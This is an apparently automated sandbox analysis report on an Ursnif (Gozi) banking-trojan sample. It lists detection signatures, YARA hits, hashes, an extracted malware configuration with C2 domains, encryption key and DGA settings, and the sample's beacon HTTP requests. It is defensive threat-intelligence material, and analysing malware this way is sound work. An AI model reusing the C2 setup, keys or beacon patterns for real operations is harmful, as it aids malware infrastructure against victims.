Play interactive tour

Edit tour

Windows Analysis Report R0xLHA2mT5.exe

Overview

General Information

Sample Name:	R0xLHA2mT5.exe
Analysis ID:	528072
MD5:	9f3b8462c508884f6966f3ad4a275799
SHA1:	6288e611de585a6dc56c6399ef03012698d60392
SHA256:	a548ac73d6acb5a260cb2e1760946c37ce94d89f3cd2a5b126e266e007dfc543
Tags:	exeGozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

Detected unpacking (changes PE section rights)

Writes or reads registry keys via WMI

Machine Learning detection for sample

Writes registry values via WMI

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

PE file contains strange resources

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

R0xLHA2mT5.exe (PID: 3608 cmdline: "C:\Users\user\Desktop\R0xLHA2mT5.exe" MD5: 9F3B8462C508884F6966F3AD4A275799)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.559974818.00000000042A9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.355125356.0000000004778000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: R0xLHA2mT5.exe PID: 3608	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.R0xLHA2mT5.exe.42a94a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.R0xLHA2mT5.exe.22b0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.R0xLHA2mT5.exe.42a94a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.558633327.0000000002130000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: R0xLHA2mT5.exe	Metadefender: Detection: 22%			Perma Link
Source: R0xLHA2mT5.exe	ReversingLabs: Detection: 45%

Machine Learning detection for sample

Show sources

Source: R0xLHA2mT5.exe

Joe Sandbox ML: detected

Source: 0.2.R0xLHA2mT5.exe.2130e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.R0xLHA2mT5.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.3.R0xLHA2mT5.exe.2140000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Unpacked PE file: 0.2.R0xLHA2mT5.exe.400000.0.unpack

Source: R0xLHA2mT5.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 74.6.231.21:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49721 version: TLS 1.2

Source:	Binary string: C:\julokapinuf\da.pdb source: R0xLHA2mT5.exe
Source:	Binary string: C:\julokapinuf\da.pdbP+C source: R0xLHA2mT5.exe

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 74.6.231.21 74.6.231.21
Source: Joe Sandbox View	IP Address: 87.248.100.216 87.248.100.216

Source: global traffic	HTTP traffic detected: GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=0kqfhp5gpsta9&b=3&s=ki

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 24 Nov 2021 17:24:25 GMTp3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"cache-control: privatex-content-type-options: nosniffcontent-type: text/html; charset=UTF-8x-envoy-upstream-service-time: 12server: ATSContent-Length: 1048Age: 2Connection: closeStrict-Transport-Security: max-age=31536000Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=0p10fa5gpsta9&partner=;X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block

Source: R0xLHA2mT5.exe, 00000000.00000003.448860394.000000000242A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559628202.000000000242D000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354035535.00000000023E6000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354962867.000000000242B000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354031046.00000000023E2000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354046152.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.com equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.448860394.000000000242A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559628202.000000000242D000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354035535.00000000023E6000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559383521.00000000023C6000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354962867.000000000242B000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354031046.00000000023E2000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354046152.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp	String found in binary or memory: +www.yahoo.com; equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.355137973.000000000477B000.00000004.00000040.sdmp	String found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fbxL1xwjyIDF%2fWhnrXJWmz2Twl8%2fgY8V0mj8FFAgQDgBa_2Fr%2fju3YDzGHJQvJy7Ul%2fWNFipJkcZdncwpj%2fywnxu6MUxONK0Xvi9f%2fucETuIFdm%2fwokZPT9eFRDqyFNdNZik%2fFUVXSPqAP_2FwjH1nuX%2f3xMD5fDEH8K9cekhYWTKgU%2flNhM0C6AYaGMU%2fwTNgbH70ZfWGyVix%2f60.crw'"></noscript> equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.354046152.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: Location: https://www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	String found in binary or memory: MUxOnew-fp-shed.wg1.b.yahoo.comwww.yahoo.comVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTK equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: com.yahoo.www. equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/ equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/6 equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/? equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/\en-US\CRYPT32.dll.muiq equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000002.559418267.00000000023E0000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448819097.00000000023DD000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	String found in binary or memory: s://www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fbxL1xwjyIDF%2fWhnrXJWmz2Twl8%2fgY8V0mj8FFAgQDgBa_2Fr%2fju3YDzGHJQvJy7Ul%2fWNFipJkcZdncwpj%2fywnxu6MUxONK0Xvi9f%2fucETuIFdm%2fwokZPT9eFRDqyFNdNZik%2fFUVXSPqAP_2FwjH1nuX%2f3xMD5fDEH8K9cekhYWTKgU%2flNhM0C6AYaGMU%2fwTNgbH70ZfWGyVix%2f60.crw'; equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000002.559418267.00000000023E0000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559383521.00000000023C6000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448819097.00000000023DD000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.560060461.0000000004FDA000.00000004.00000010.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com- equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZd equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000002.559418267.00000000023E0000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448819097.00000000023DD000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com5 equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000002.559383521.00000000023C6000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com>Y equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comG equals www.yahoo.com (Yahoo)
Source: R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comows\system32\jsproxy.dll equals www.yahoo.com (Yahoo)

Source: R0xLHA2mT5.exe, 00000000.00000002.559418267.00000000023E0000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354035535.00000000023E6000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448819097.00000000023DD000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000003.355137973.000000000477B000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=0p1
Source: R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000003.355137973.000000000477B000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp	String found in binary or memory: https://qoderunovos.website
Source: R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp	String found in binary or memory: https://soderunovos.website
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/0
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/T
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/_
Source: R0xLHA2mT5.exe, 00000000.00000002.559418267.00000000023E0000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448819097.00000000023DD000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/jdraw/Few7Dvcu/4Rmd9fKY9IL2UtEgJUD5q9n/BajREx_2Bc/Peb7n8IHTpfTu9y6I/faIv
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/s
Source: R0xLHA2mT5.exe, 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp	String found in binary or memory: https://soderunovos.websitehttps://qoderunovos.website
Source: R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/6
Source: R0xLHA2mT5.exe, 00000000.00000003.448832665.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559469390.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/?
Source: R0xLHA2mT5.exe, 00000000.00000003.355137973.000000000477B000.00000004.00000040.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354933028.00000000023FB000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fbxL1xwjyIDF%2fWhnrXJWmz
Source: R0xLHA2mT5.exe, 00000000.00000002.559418267.00000000023E0000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.448819097.00000000023DD000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354046152.00000000023FB000.00000004.00000001.sdmp, R0xLHA2mT5.exe, 00000000.00000003.354919579.00000000023E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJ
Source: R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp	String found in binary or memory: https://yahoo.com/b
Source: R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp	String found in binary or memory: https://yahoo.com/d
Source: R0xLHA2mT5.exe, 00000000.00000002.559183663.000000000236A000.00000004.00000001.sdmp	String found in binary or memory: https://yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZd

Source: unknown

DNS traffic detected: queries for: yahoo.com

Source: C:\Users\user\Desktop\R0xLHA2mT5.exe

Code function: 0_2_022B5988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,

0_2_022B5988

Source: global traffic	HTTP traffic detected: GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=0kqfhp5gpsta9&b=3&s=ki

Source: unknown	HTTPS traffic detected: 74.6.231.21:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49721 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.354992227.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355061879.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355102011.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.560013904.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355079733.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355113871.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355042494.0000000004778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355017568.0000000004778000.00000004.00000040.sdmp, type: MEMORY
